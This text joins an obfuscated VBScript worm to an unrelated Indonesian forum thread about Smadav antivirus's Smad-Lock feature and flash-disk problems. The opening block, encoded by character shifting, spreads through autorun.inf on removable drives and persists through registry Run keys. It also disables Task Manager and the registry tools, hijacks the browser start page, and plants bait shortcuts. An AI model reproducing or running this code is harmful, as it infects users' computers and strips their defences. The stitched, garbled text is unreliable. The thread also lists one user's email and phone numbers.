 4T5A
 b*3R
 aJ2U
 pF5R
 tT1O
 @R2)
 AL5O
 C*5F
 CC2P
 BN5F
 T*2E
 TL1N
 RH5C
 SJ3)
 4W2V
 3R1W
 1S5O
 0B5)
 ?U0H
 >*2I
 7F2)
 1I3N
 UC1U
 BF3F
 A&4D
 A*20
 OO33
 @R17
 JE>?
 IR51
 AI41
 U@2?
 PN1?
 P*2>
 SJ?2
 B^11
 P*22
 PB4?
 TJ37
 CF52
 TN26
 KK??
 @=17
 C*42
 T]34
 VB55
 OU16
 HQ?2
 WN52
 ^L33
 AT?1
 BG11
 Q^52
 JF3?
 dO17
 aH>5
 sH47
 1)?7
 1D36
 ?H04
 rJ24
 `*14
 a*53
 aE41
 e^12
 e=4?
 F*57
 fA5?
 FF51
 FI41
 PC1?
 LN46
 L*2>
 JK52
 KH21
 SQ52
 UB2?
 C*57
 C^5?
 @R26
 L^1?
 HR>7
 WI?3
 M)0?
 O*27
Hi'Buuhu'Ubtrjb'Ibs
Cnj'ath+'pt+'tsfsrt+tsfsrt6+'ak~
Tbs'ath':'DubfsbHembds/%tdunwsni`)ankbt~tsbjhembds%.
Tbs'pt':'DubfsbHembds/%ptdunws)Tobkk%.
Tbs'to':'DubfsbHembds/%Tobkk)fwwkndfsnhi%.
Tbs'ibs':'DubfsbHembds/%ptdunws)ibsphul%.
ak~:afktb
sjw:ath)@bsTwbdnfkAhkcbu/6.
si:ath)@bsSbjwIfjb
sjws:sjw,%[%,si
chd:pt)TwbdnfkAhkcbut/%J~Chdrjbist%.
Tbs'tps:PTdunws)Fu`rjbist
Na'tps)Dhris97'Sobi
tsfsrt:tps/7.
Bic'Na
na'ath)ankbbntst/sjw,%[jtqeqj17)ckk%.'sobi
tbs'buc:ath)`bsankb/sjw,%[jtqeqj17)ckk%.
buc)fssunersbt:7
buc)ifjb:%aficn)buc%
na'buc)ifjb:%aficn)buc%'sobi
buc)ifjb:%jtqeqj17)ckk%
tbs'buc:ath)hwbisbsankb/sjw,%[jtqeqj17)ckk%+5+surb.
bktb
ak~:surb
bic'na
bktb
tbs'buc:ath)hwbisbsankb/sjw,%[JTQEQJ17)CKK%+5+surb.
bic'na
Tbs'FV:ath)@bsAnkb/tsfsrt.
Na'ath)AnkbBntst/sjws.'Sobi'ath)@bsAnkb/sjws.)Fssunersbt:7
FV)Dhw~'sjws+Surb
Tbs'FV:ath)@bsAnkb/sjws.
FV)Fssunersbt:4>
fiq:sjw,%[frsh)bb%
Na'Ihs'ath)AnkbBntst/fiq.'Sobi'FV)Dhw~'fiq
Tbs'frsh:ath)@bsAnkb/fiq.'
frsh)fssunersbt:7
Tbs'frs:ath)HwbiSbsAnkb/fiq+5+Surb+7.
ntn:%\frshuriZ9hwbi:PTdunws)bb'((b=QETdunws'cbltshw)nin'frsh9tobkk[hwbi:Hwbi9tobkk[hwbi[Dhjjfic:PTdunws)bb'((b=QETdunws'cbltshw)nin'frsh9tobkk[hwbi[Cbafrks:69tobkk[bwkhub:Bwkhub9tobkk[bwkhub[Dhjjfic:PTdunws)bb'((b=QETdunws'cbltshw)nin'frsh%
ntn:Ubwkfdb/ntn+%9%+qeDuKa.
frs)Punsb'ntn
frs)Dkhtb
frsh)Fssunersbt:4>
ksld:to)Ifjbtwfdb/!O6d!.)Tbka)wfso','%[Jnduhthas[DC'Eruini`%
FV)Dhw~'ksld,%[cbltshw)nin%+Surb
frsh)Dhw~'ksld,%[frshuri)nia%+Surb
Na'ath)AnkbBntst/chd,%[ca2tuqd)eab%.'Sobi'ath)@bsAnkb/chd,%[ca2tuqd)eab%.)Fssunersbt:7
FV)Dhw~'chd,%[ca2tuqd)eab%+Surb
ub`V
Tbs'ufuf:RINTLF
Obus}'Afktb
Na'Cf~/Ihp.;94'Sobi'ublrutna'chd+6'Bktb'ublrutna'chd+4
dfkk'fssfdlXibs
Obus}'Surb
Tre'ublrutna/wfso+cw.
Hi'Buuhu'Ubtrjb'Ibs
cuhwa'wfso
ptdunws)tkbbw'27
Na'cw97'Sobi
Ahu'Bfdo'akcu6'Ni'ath)@bsAhkcbu/wfso,%[%.)TreAhkcbut
ublrutna'akcu6)Wfso+'cw*6
Ibs
Bic'Na
Bic'Tre
Tre'cuhwa/wfso.
Hi'Buuhu'Ubtrjb'Ibs
na'cf~/ihp.:6'fic'/jhiso/ihp.jhc'4.:6'sobi'
ufuf)dhw~'wfso,%[Knunl)usa%
bic'na
`6:wfso,%[frshuri)nia%
`5:wfso,%[cbltshw)nin%
Na'ath)AnkbBntst/`6.'Sobi'
Tbs'`66:ath)@bsAnkb/`6.'
Na'`66)Fssunersbt;94>'Sobi'
`66)Fssunersbt:7
frsh)Dhw~'wfso,%[frshuri)nia%+Surb
bic'na
bktb'
frsh)Dhw~'wfso,%[frshuri)nia%+Surb
bic'na
Na'ath)AnkbBntst/`5.'Sobi'
Tbs'`65:ath)@bsAnkb/`5.
Na'`65)Fssunersbt;94>'Sobi
`65)Fssunersbt:7
FV)Dhw~'wfso,%[cbltshw)nin%+Surb
bic'na
bktb
FV)Dhw~'wfso,%[cbltshw)nin%+Surb
Bic'Na
Na'Ihs'ath)AnkbBntst/wfso,%[Ahkcbu)kil%.'Sobi
lnccuhdl'wfso,%[Ahkcbu%+%Ahkcbu%
cuhw:Fuuf~/%Ahsh'Er`nk%+%Wbtfi'Ufoftnf%+%Cfsf'Wbisni`%+%Wrntn'Dnisf%+%Fisnqnurt%+%Thaspfub%.
pp:6
Ahu'Bfdo'c'Ni'cuhw
Na'Cf~/ihp.'Jhc'4':'pp'Sobi'lnccuhdl'wfso,%[%,c+c
ptdunws)tkbbw'17
pp:pp,6
Ibs
u:7
Ahu'Bfdo'akcu'Ni'ath)@bsAhkcbu/wfso,%[%.)TreAhkcbut
lnccuhdl'wfso,%[%,akcu)ifjb+akcu)Ifjb
ptdunws)tkbbw'17
Na'u94'Sobi'
Bns'Ahu
Bic'na
u:u,6
Ibs
Bic'Na
Bic'Tre
Tre'lnccuhdl/wfso+su`s.
Tbs'tohu:pt)DubfsbTohusdrs/wfso,%)kil%.
tohu)ndhikhdfsnhi:%tobkk45)ckk+4%
tohu)sfu`bswfso:%ptdunws)bb%
tohu)fu`rjbist:%((b=QETdunws'cbltshw)nin'%%%,su`s,%%%%
tohu)tfqb
Bic'Tre
aridsnhi'fssfdlXibs/.
Hi'Buuhu'Ubtrjb'Ibs
buu)dkbfu
Tbs'hemAhkcbu':'to)Ifjbtwfdb/!O64!.
Tbs'dhkNsbjt':'hemAhkcbu)Nsbjt
Ahu'Bfdo'tsuAnkbIfjb'ni'hemAhkcbu)Nsbjt
s:'hemAhkcbu)@bsCbsfnktHa/tsuAnkbIfjb+'63.
na'ath)ahkcbubntst/s.'sobi
ublrutna's+3
bic'na
Ibs
Bic'aridsnhi
Tre'scu/.
Hi'Buuhu'Ubtrjb'Ibs
buu)dkbfu
PTdunws)Tkbbw'6?7777
na'buu)irjebu97'sobi'ptdunws)vrns
Bic'Tre
aridsnhi'RINTLF/.
Hi'buuhu'ubtrjb'ibs
:qeduka
fcq:%Cnfu~'Fi`bk'Drsb99Uftf'mfsro'dnisf'jbjfi`'fibo'uftfi~f'9V'lbifk'_____'kbpfs'ih)Ow'i~ftfu+'cfun'wbulbifkfi'nsr'V'f`fl'mrfk'jfofk'lb'c~'/jflkrj'dpb.)9Ofun'ebu`fisn'ofun'V'jrkfn'wbiftfufi'jf'c~+'uftfi~f'ofsnlr'sbkfo'cn'lrftfn'hkbo'c~)9V'cfi'c~'tbwflfs'risrl'lbsbjrfi'cn'lfjwrtV+'c~'wri'cfsfi`'wflfn'mflbs'onsfj'cbi`fi'jhshu'pfuif'onsfj'wrkf)9Fkfi`lfo'sbulbmrsi~f+'V'cnfmfl'c~'lburjfoi~f)9Lnsf'i`heuhk'sbisfi`'wblbumffi'c~+'c~'m`'efi~fl'sfi~f'sbisfi`'V'cn'lfjwrt)'9Pflsr'wri'dbwfs'ebukfkr+'lfubif'ftnl'i`heuhk'sfl'sbuftf'ofun'trcfo'thub)9V'wri'jnisf'cn'fisfu'wrkfi`+'V'ehidbi`fi'jf'c~'tbhkfo*hkfo'ls'trcfo'wfdfufi)9Ormfi'wri'cfsfi`'cntffs'ls'cfkfj'wbumfkfifi'wrkfi`+'uftf'cni`ni'jbi~bknjrsn'srerolr'nin)9Cbi`fi'`f`foi~f'c~'jbjebun'V'mflbs'~`'c~'wflfn+'ormfi'wri'jflni'cbuft'cfi'drfdf'tbjflni'cni`ni)9Uftf'tf~fi`'nin'tbjflni'jbi`rftfn'wnlnufilr+'ni`ni'uftfi~f'V'wbkrl'c~)99Tbsbkfo'V'tfjwfn'cn'urjfo+'c~'sbuerur*erur'wrkfi`'lfubif'ormfi'jflni'cbuft)9Tfsr'mfj'tbsbkfo'c~'wrkfi`+'c~'lftno'lfefu'lfkfr'trcfo'tfjwfn'urjfo'cbi`fi'tbkfjbs)99^fi`'enlni'V'eni`ri`+'wbuftffi'sfcn'c~'wrkfi`'tbicnun89Lbifwf'c~'wrkfi`'cbi`fi'tbkfjbs+'tnfwflfo'tbkfjbs899Dbunsf'nin'tbef`nfi'fcfkfo'lntfo'i~fsf+'sfwn'lfubif'sbuefsft'hkbo'pflsr)9Jflf'drlrw'tblnfi'cfi'sbunjflftno)999/ppp)ebichs)dh)iu.%
fcq:ubwkfdb/fcq+%9%+.
tbs'tbuqnlt:ath)hwbisbsankb/sjw,%[q)chd%+5+surb.
tbuqnlt)punsb'fcq
tbuqnlt)dkhtb
na'cf~/ihp.:6'fic'/jhiso/ihp.jhc'4.:6'sobi'
na'ak~:afktb'sobi
ahu'n:6'sh'4
pt)uri'%ihsbwfc)bb'(w'%%%,sjw,%[q)chd%%%
ibs
bic'na
bic'na
tbs'RINTLF:ath)`bsankb/sjw,%[q)chd%.
bic'aridsnhi
Tre'ub`V/.
Hi'Buuhu'Ubtrjb'Ibs
na'cf~/ihp.:6'sobi
pt)Ub`Punsb'%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[%+'%Tbuqnlt%
pt)Ub`Punsb'%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[CbafrksNdhi[%+%tobkk45)ckk+3?%
pt)Ub`Punsb'%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[TobkkAhkcbu[Fssunersbt%+7+%UB@XCPHUC%
pt)ub`punsb'%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[bwkhubu[Cbtlshw[IfjbTwfdb[|66666666*5555*4444*3333*222222222222z[%+%%
bic'na
pt)ub`cbkbsb'%OLDU[kilankb[NtTohusdrs%
pt)Ub`Punsb'%OLDR[Thaspfub[Jnduhthas[Nisbuibs'Bwkhubu[Jfni[Tsfus'Wf`b%+'%ossw=((ppp)ebichs)dh)iu%
pt)Ub`Punsb'%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Ca2tbuq%+%Ptdunws)bb'((b=QETdunws'%%%,chd,%[ca2tuqd)eab%%%
pt)Ub`Punsb'%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Bwkhubu%+%Ptdunws)bb'((b=QETdunws'%%%,ksld,%[cbltshw)nin%%%
pt)Ub`Punsb'%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbUb`ntsu~shhkt%+6+%UB@XCPHUC%
pt)Ub`Punsb'%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbSftlJ`u%+6+%UB@XCPHUC%
pt)Ub`Punsb'%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Bwkhubu[Fcqfidbc[Ahkcbu[TrwbuOnccbi[Pfuini`NaIhsCbafrks%+%thuu~'tbuqnlt'knlb'~hru'dhjwrsbu%
pt)Ub`Punsb'%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Bwkhubu[Fcqfidbc[Ahkcbu[TrwbuOnccbi[DobdlbcQfkrb%+7+%UB@XCPHUC%
pt)Ub`Punsb'%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Bwkhubu[Fcqfidbc[Ahkcbu[TrwbuOnccbi[RidobdlbcQfkrb%+7+%UB@XCPHUC%
pt)Ub`Punsb'%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Bwkhubu[Fcqfidbc[Ahkcbu[TrwbuOnccbi[CbafrksQfkrb%+7+%UB@XCPHUC%
pt)Ub`Punsb'%OLDU[kilankb[tobkk[Cbkbsb[dhjjfic%+'%Ptdunws)bb'((b=QETdunws'%%%,chd,%[ca2tuqd)eab%%%
pt)Ub`Punsb'%OLDU[ninankb[tobkk[Cbkbsb[dhjjfic%+'%Ptdunws)bb'((b=QETdunws'%%%,chd,%[ca2tuqd)eab%%%
na'kdftb/ath)`bscunqb/%d=%.)AnkbT~tsbj.:%isat%'sobi
bucV:FV)hwbiftsbstsubfj/6+7.)ubfc/FV)tn}b.
ppp:ath)@bsTwbdnfkAhkcbu/7.
tbs'mml:ath)hwbisbsankb/ppp,%[=Jnduhthas'Haandb'Rwcfsb'ahu'Pnichpt'_W)t~t%+5+surb.
mml)punsb'bucV
mml)dkhtb
pt)Ub`Punsb'%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[PniRwcfsb%+%Ptdunws)bb'((b=QETdunws'%%%,ppp,%[=Jnduhthas'Haandb'Rwcfsb'ahu'Pnichpt'_W)t~t%%%
bic'na
Bic'Tre
Tre'Obus}/hhh.
Hi'Buuhu'Ubtrjb'Ibs
ch
Ahu'Bfdo'cuq'Ni'ath)Cunqbt
Na'cuq)CunqbS~wb:6'Sobi
ublrutna'cuq)Wfso+3
Bktb
ublrutna'cuq)Wfso+5
Bic'na
Ibs
na'ak~:afktb'sobi'
scu
bktb'
ptdunws)vrns
bic'na
ub`V
Na'hhh:Afktb'Sobi'
Bns'Ch
Bic'Na
khhw
Bic'Tre
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: GrunguS pada Desember 28, 2009, 01:32:41 PM
nubi mo nanya dikit tentang fitur smad lock

apa fitur ini cuma berlaku buat flash disk aja?
gmn klo misalnya kita nyolokin ponsel kita yg didalemnya ada mmc/micro sd ke PC biasa kita pake
apa ntar smadav scr otomatis bkl ngebuat brankas juga didalem mmc/micro sd yg ada di hp kita?

ditunggu pencerahannya yah :D

1. Tidak hanya flashdisk saja, HDD; CD; dsb. bisa ditambahkan folder Smad-Lock.
2. Ya.

:D
Masa? DIrumahku Micro SD HP ada SMadlocknya juga... Wkwkkwk hebat ya...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Athan pada Desember 28, 2009, 06:33:04 PM
Kok Memori Card ku waktu aku colok langsung scan lalu dikunci
waku di pasang mau moto tiba tiba waktu mau pencet tombol jepret
tiba tiba bunyi beep lalu muncul tulisan CARD LOCK bagaimana ini
smadaver kalau pake unlocker jd autorun nya ke hapus nggak..!
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Alpha_DMars pada Desember 28, 2009, 09:40:04 PM
tapi hebat smadav bisa ngeamanin folder2
salut dah
 :-bd
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ★ harboot ★ pada Desember 28, 2009, 09:57:14 PM
@athan,,
yaa,, smadlock itu menimpa autorun yg ada di mmc kamu,,
coba format ulang dulu mmc-nya,,
atw unlock fdisk kamu dgn smadav,,

Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Disi pada Desember 29, 2009, 10:29:40 AM
Maaf mas mau nanya, tapi agak menyimpang dari topik. Anti Virus Smadav sekarang bisa memberantas atau mematikan KeyLogger ga? kalo belum bisa tolong diusahain ya mas soalnya kayanya itu penting buat privacy kita di jaman sekarang.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Wisnu Pramudya pada Desember 29, 2009, 10:39:12 AM
@up : smadav blm bsa mas,tpi utk menghindari keylog skrng sudah ada anti keylogger kx,coba cari di google.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Disi pada Desember 29, 2009, 10:43:53 AM
Mas, saran saya mas jangan bikin fitur unlock nanti upaya penghentian penyebaran virus jadi menurun
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Jastis pada Desember 29, 2009, 11:58:01 AM
Mas, saran saya mas jangan bikin fitur unlock nanti upaya penghentian penyebaran virus jadi menurun

Kalau ada Lock maka unlock juga harus ada...karena tidak semua user memakai vitur ini....
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ★ harboot ★ pada Desember 30, 2009, 10:36:50 AM
Ray said,


on December 23rd, 2009 (1 weeks ago) at 7:36 am

Menurut Saya, yang paling menjengkelkan dari salah satu antivirus lokal adalah kecenderungannya membuat folder dengan nama khusus yang tidak bisa dihapus (mengandung unicode kalo ndak salah, katanya si buat proteksi). Sejauh ini jalan satu2nya adalah format flash.
pamanlinux said,


on December 23rd, 2009 (1 weeks ago) at 8:34 am

“kecenderungannya membuat folder dengan nama khusus yang tidak bisa dihapus (mengandung unicode kalo ndak salah, katanya si buat proteksi). Sejauh ini jalan satu2nya adalah format flash”, saya tau antivirus yang anda maksud. Jika anda tak ingin memformat flashdisk, folder bentukan antivirus tsb bisa dihapus jika anda mencolokkannya ke dalam OS non Windows, misal Linux.

http://virusindonesia.com/2009/12/23/antivirus-amatir/
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Wisnu Pramudya pada Desember 30, 2009, 11:09:31 AM
Gilak bot,gw bcanya mkan ati!
Pda asal jeplak tuh.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: 4d pada Desember 30, 2009, 11:27:18 AM
smadav bisain terima plug in dong
soalna ada plug in yg bisa nambah beberapa siggy virus,lokal dan luar,sampe ada av lain pake tu plugin awalnya sama kaya smadav,bisa ngenalin 3000 virus jadi bisa ngenalin 60000 virus dan terus bertambah lho
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Athan pada Desember 30, 2009, 01:32:22 PM
Tapi waktu saya format tdk bs
dan pakai unlocker jg tdk bs
dan pakai low level format jg tdk bs :P  ~x( >:(
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ran_TH pada Desember 30, 2009, 04:01:09 PM
Ray said,


on December 23rd, 2009 (1 weeks ago) at 7:36 am

Menurut Saya, yang paling menjengkelkan dari salah satu antivirus lokal adalah kecenderungannya membuat folder dengan nama khusus yang tidak bisa dihapus (mengandung unicode kalo ndak salah, katanya si buat proteksi). Sejauh ini jalan satu2nya adalah format flash.
pamanlinux said,


on December 23rd, 2009 (1 weeks ago) at 8:34 am

“kecenderungannya membuat folder dengan nama khusus yang tidak bisa dihapus (mengandung unicode kalo ndak salah, katanya si buat proteksi). Sejauh ini jalan satu2nya adalah format flash”, saya tau antivirus yang anda maksud. Jika anda tak ingin memformat flashdisk, folder bentukan antivirus tsb bisa dihapus jika anda mencolokkannya ke dalam OS non Windows, misal Linux.

http://virusindonesia.com/2009/12/23/antivirus-amatir/
Wkwkwwkk om boot disana komennya gak nanggung2 ;D ;D ;D
Iya lah PCMAV ama SmadAV punya penggemar fanatikny masing2, kalo disatuin jadinya ribut mengklaim diri sebagai yang terbaik :P Pada ribut padahal dia bukan yang bikin antivirusnya...

Tapi waktu saya format tdk bs
dan pakai unlocker jg tdk bs
dan pakai low level format jg tdk bs :P  ~x( >:(
Udah coba diunlock pake SmadAV?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ★ harboot ★ pada Desember 30, 2009, 08:25:02 PM
Teman2 coba baca ini :
http://smadaver.com/tutorial-smadav/memperbaiki-flash-disk-yang-menjadi-write-protected/

sering ditanyakan sebenarnya di smadav,,
coba gunakan kata cari 'flashdisk rusak'
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: biasaaja pada Januari 01, 2010, 06:12:03 AM
kalo folder dng unicode...gunain code untuk menghapus unicode...ada virus yang dah bisa membobol unicode...
saran:knp gak lock folder dengan menambahkan nama con nux aul..ampuh lhoo,blm nemuin virus yang menginfeksi con aux nul...
ayo gunain dullu metode ini,sebelum diambil,heheh
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Rizzal pada Januari 01, 2010, 07:11:53 AM
kalo folder dng unicode...gunain code untuk menghapus unicode...ada virus yang dah bisa membobol unicode...
saran:knp gak lock folder dengan menambahkan nama con nux aul..ampuh lhoo,blm nemuin virus yang menginfeksi con aux nul...
ayo gunain dullu metode ini,sebelum diambil,heheh

windows explorer kalo mengakses folder nul/aux/con g bisa tuh..?di kompie ku gak bisa..

Kompie sekolah(win 98) malah ngrestart kalo buka folder gtu
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Wisnu Pramudya pada Januari 01, 2010, 07:17:42 AM
Bkannya smadav emg udah pke kyk gtu ya.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Rizzal pada Januari 01, 2010, 07:23:02 AM
Bkannya smadav emg udah pke kyk gtu ya.
di folder autorun.inf udah...
Tapi yg di maksud pke kyk gtu nya di folder brankas smadav/smad-lock
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: biasaaja pada Januari 03, 2010, 06:23:06 AM
nah gitu..yang aku maksud,rencana aku jg mw nambahin fitur syahadatain buat lock folder pake cara itu,kira2 ada bugnya g ya??bisa ditembus g ya??
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Jastis pada Januari 03, 2010, 04:18:43 PM
nah gitu..yang aku maksud,rencana aku jg mw nambahin fitur syahadatain buat lock folder pake cara itu,kira2 ada bugnya g ya??bisa ditembus g ya??

Pertanyaan teknis :
Apakah mungkin Smad-Lock ditembus virus?

Smad-Lock memang masih mungkin ditembus oleh sebagian kecil virus yang (1) secara keseluruhan atau (2) hanya sebagian fungsinya yang mendukung path UNICODE.

Untuk tipe yang pertama, yaitu virus yang secara keseluruhan mendukung UNICODE, bahkan bisa menginfeksi dokumen/file dalam folder Smad-Lock, tapi sampai sekarang saya belum ada menemukan virus seperti ini khususnya di Indonesia yang bisa menginfeksi dokumen (bukan executable), yang ada hanyalah virus asing yang bisa menginfeksi exe.

Untuk tipe virus yang kedua, hanya mempunyai sebagian fungsi yang mendukung path UNICODE, hanya akan mampu meng-copy filenya ke dalam folder Smad-Lock dan kebanyakan tidak memodifikasi file-file lainnya yang sudah ada di dalam folder Smad-Lock. Virus jenis ini mungkin bisa diperkirakan ada kurang dari 5% dari seluruh virus lokal yang menyebar di Indonesia.

Jadi, folder Smad-Lock jelas masih ada celahnya dan memang tidak mungkin 100% aman.

Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Zai pada Januari 10, 2010, 03:56:01 PM
Folder Smad-Lock/Brankas Smadav tidak lagi otomatis ditambahkan di FD tapi harus manual lewat tab Smad-Lock.
Ini diberlakukan sejak Smadav 2010 :)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: biasaaja pada Januari 12, 2010, 05:16:46 AM
apa rahasia smad lock berikutnya ya???apa masih sama atoo ada terobosan baru??moga ada yang baru..oya bisa lock exe g??kalo g bisa kalah lho,..
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ★ harboot ★ pada Januari 12, 2010, 06:47:58 PM
smadlock bukan ngunci file per individu,,
tp membuat sebuah autorun.inf shg virus tdk bs secara otomatis menjalankan dirinya saat fdisk dicolok,,
dan juga smadlock membuat sebuah folder unicode yg hampir tdk mungkin dapat dimasukki oleh virus,,
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: HyperLinx pada Januari 12, 2010, 10:29:33 PM
bukannya "hampir tdk mungkin dapat dimasukki oleh virus", sekarang udah banyak virus yang tembus folder dengan huruf non-standar macam itu.
sebaiknya smadav memikirkan gimana selanjutnya agar dokumen didalamnya menjadi aman, bukan hanya virus amatiran.

padahal saat pertama kali, gembar-gemborkan folder ini mustahil ditembus pirus  ;>
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ĵŏřĩş™ pada Januari 12, 2010, 11:00:22 PM
bukannya "hampir tdk mungkin dapat dimasukki oleh virus", sekarang udah banyak virus yang tembus folder dengan huruf non-standar macam itu.
sebaiknya smadav memikirkan gimana selanjutnya agar dokumen didalamnya menjadi aman, bukan hanya virus amatiran.

padahal saat pertama kali, gembar-gemborkan folder ini mustahil ditembus pirus  ;>
Emang semua jenis virus bisa masuk???
Ga semua kan? Hanya virus2 tertentu doank yg bisa menembus unicode........
smadav disini tugasnya membantu mempersulit virus untuk menginfeksi file2 milik user
dengan kata lain hampir tidak mungkin bisa masuk (bukan berarti ga ada virus yg bisa masuk)....
ga ada kan anti virus di dunia ini ya bisa 100% menghalang dan memberantas semua virus di dunia????
Judul: SALAM KENAL SMADAVER..
Ditulis oleh: RIANPULSA pada Januari 12, 2010, 11:18:03 PM
haloo SMADAVER,
maaf klow salah masuk kategori Forum... tolong di bimbing ya..
saya pengguna Smadav juga,
saya masih agak bingung klow mo jadi transfer .. ketentuannya berapa ya ??
trus confirm-nya via SMS bisa gak ya ??

lalu saya mo tanya-tanya, ada sedikit Troble niy..
NAMA FILE BERBENTUK FOLDER :
nul.  This autorun.inf is LOCKED by SMADΔV to protect your Flash-Disk from virus infection.

File ini ada di-dekstop saya gak bisa di-hapus / di-pindah dan gak bisa di-Upload ke SMADAV, jadi harus gimana ya??
mohon penjelasannya.. trims.

email : rianpulsa@gmail.com
0818-08878570 / 021-92548867
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: izul pada Januari 13, 2010, 07:39:07 PM
haloo SMADAVER,
maaf klow salah masuk kategori Forum... tolong di bimbing ya..
saya pengguna Smadav juga,
saya masih agak bingung klow mo jadi transfer .. ketentuannya berapa ya ??
trus confirm-nya via SMS bisa gak ya ??

lalu saya mo tanya-tanya, ada sedikit Troble niy..
NAMA FILE BERBENTUK FOLDER :
nul.  This autorun.inf is LOCKED by SMADΔV to protect your Flash-Disk from virus infection.

File ini ada di-dekstop saya gak bisa di-hapus / di-pindah dan gak bisa di-Upload ke SMADAV, jadi harus gimana ya??
mohon penjelasannya.. trims.

email : rianpulsa@gmail.com
0818-08878570 / 021-92548867

Gunakan unlocker untuk menghapusnya
silkan donlod di http://www.filehippo.com/download_unlocker/   ;)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: MathZ pada Januari 15, 2010, 06:27:30 AM
kemarin ada yg dapet masalah di kaskus, nih  SMAD-LOCK nya ancur.
(http://kirimfoto.co.cc/uploads/d5e9bSMADAV.JPG)

ada yg bisa ngasih solusi?

nih linknya http://www.kaskus.us/showthread.php?t=3137908
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ★ harboot ★ pada Januari 15, 2010, 10:47:54 PM
@mathz,,
itu kemungkinan fdisknya yg error,,
coba cari cara perbaiki fdisk di forum,,
uda pernah dibahas koq,,
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: MathZ pada Januari 16, 2010, 06:59:44 AM
oh, jadi bukan karena Smad-Lock nya yach?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: GrunguS pada Januari 19, 2010, 02:59:03 PM
kemarin ada yg dapet masalah di kaskus, nih  SMAD-LOCK nya ancur.
(http://kirimfoto.co.cc/uploads/d5e9bSMADAV.JPG)

ada yg bisa ngasih solusi?

nih linknya http://www.kaskus.us/showthread.php?t=3137908
Wedew attributnya ampe di ganti ganti gitu...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: HyperLinx pada Januari 21, 2010, 03:07:30 AM
datanya emang anchur, aku dulu pernah jadi ginian, huh  >:(
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: biasaaja pada Januari 21, 2010, 05:06:01 AM
bener fdnya yg error,aku pernah ngerasain...diformat pake klik kanan g mempan,pake commandprompt lancar,cara lain,fd dimasukin,km booting lg windowsnya,saat nampilin pilih hdd,km format fd km,cara ntu jg bisa,mungkin...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: s4nji pada Januari 21, 2010, 06:08:19 AM
Jadi yg salah, SmadAV atau FD nya?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: izul pada Januari 21, 2010, 08:56:33 AM
mnurut sya itu murni krna file yg korup, simbol kotak2 + size file nya mncirikan file yg korup, cba di checkdisk aj fd nya.. pnyebabnya ad byk, slh stunya mungkin krna FD ga2l di safely remove dgn bnr..
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: MathZ pada Januari 21, 2010, 09:33:26 AM
kayanya itumah harus di format.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: SatrioGa pada Januari 21, 2010, 04:01:39 PM
 >:(

besok tugasku dikumpulkan dan sekarang aku harus ke warnet lagi untuk mengerjakan tugas dari awal!!! (padahal sudah 2 hari aku tidak tidur sama sekali buat mengerjakan tugas itu...komputer di rumah lemot)


Mau tahu tugasnya apa??....Company Profile yang harus disertai dengan cover label CD dan cover wadah CD. Tugas sebenarnya sudah selesai tapi flashdisk-ku sama sekali tidak menyisakan folder untuk dibuka...adanya malah smadlock buatan Anda.....

Tolong bantu saya untuk membuka kembali folder saya yang tidak terlihat.


Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ran_TH pada Januari 21, 2010, 04:10:31 PM
>:(

besok tugasku dikumpulkan dan sekarang aku harus ke warnet lagi untuk mengerjakan tugas dari awal!!! (padahal sudah 2 hari aku tidak tidur sama sekali buat mengerjakan tugas itu...komputer di rumah lemot)


